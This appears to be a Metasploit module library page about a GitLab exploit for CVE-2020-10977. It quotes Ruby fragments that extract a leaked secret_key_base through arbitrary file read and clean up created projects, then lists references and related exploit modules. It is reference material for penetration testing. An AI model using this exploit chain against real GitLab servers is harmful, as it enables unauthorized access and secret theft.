510: secret_key_base = secrets_yml[/secret_key_base:\s+(.*)/, 1]
511: if secret_key_base.nil?
512: fail_with(Failure::UnexpectedReply, 'Unable to successfully extract leaked secret_key_base value')
513: end
514:
515: print_good("Extracted secret_key_base #{secret_key_base}")
516: print_status('NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read')
517:
Failed to delete project <PATH>
Here is a relevant code snippet related to the "Failed to delete project <PATH>" error message:
524:
525: print_status("Attempting to delete project #{project['path']}")
526: git_lab_client.delete_project(project: project)
527: print_status("Deleted project #{project['path']}")
528: rescue StandardError
529: print_error("Failed to delete project #{project['path']}")
530: end
531: end
532:
533: def exploit
534: secret_key_base = read_secret_key_base
Related Pull Requests
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in rename_file method
- #15540 Merged Pull Request: Add option for running cmd_execute in a subshell
- #15303 Merged Pull Request: Fix dir method for windows shell sessions
- #15547 Merged Pull Request: Bump rex-text to 0.2.36
References
- CVE-2020-10977
- https://hackerone.com/reports/827052
- https://about.gitlab.com/releases/2020/03/26/security-release-12-dot-9-dot-1-released/
See Also
Check also the following modules related to this module:
- exploit/multi/http/gitlab_exif_rce
- exploit/multi/http/gitlab_shell_exec
- auxiliary/scanner/http/gitlab_graphql_user_enum
- auxiliary/scanner/http/gitlab_login
- auxiliary/scanner/http/gitlab_user_enum
- exploit/multi/http/apache_jetspeed_file_upload
- exploit/multi/http/bolt_file_upload
- exploit/multi/http/clipbucket_fileupload_exec
- exploit/multi/http/coldfusion_ckeditor_file_upload
- exploit/multi/http/dotcms_file_upload_rce
- exploit/multi/http/eventlog_file_upload
- exploit/multi/http/horde_form_file_upload
- exploit/multi/http/hp_sitescope_uploadfileshandler
- exploit/multi/http/jboss_deploymentfilerepository
- exploit/multi/http/monstra_fileupload_exec
- exploit/multi/http/nibbleblog_file_upload
- exploit/multi/http/opmanager_socialit_file_upload
- exploit/multi/http/oracle_ats_file_upload
- exploit/multi/http/phpfilemanager_rce
- exploit/multi/http/playsms_filename_exec
- exploit/multi/http/rocket_servergraph_file_requestor_rce
- exploit/multi/http/sit_file_upload
- exploit/multi/http/sysaid_auth_file_upload
- exploit/multi/http/sysaid_rdslogs_file_upload
- exploit/multi/http/uptime_file_upload_1
- exploit/multi/http/uptime_file_upload_2
- exploit/multi/http/webnms_file_upload
- exploit/multi/http/wp_dnd_mul_file_rce
- exploit/multi/http/wp_file_manager_rce
- exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
- exploit/multi/http/wp_simple_file_list_rce
- exploit/multi/http/wso2_file_upload_rce
Authors
- William Bowling (vakzz)
- alanfoster
Version
This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.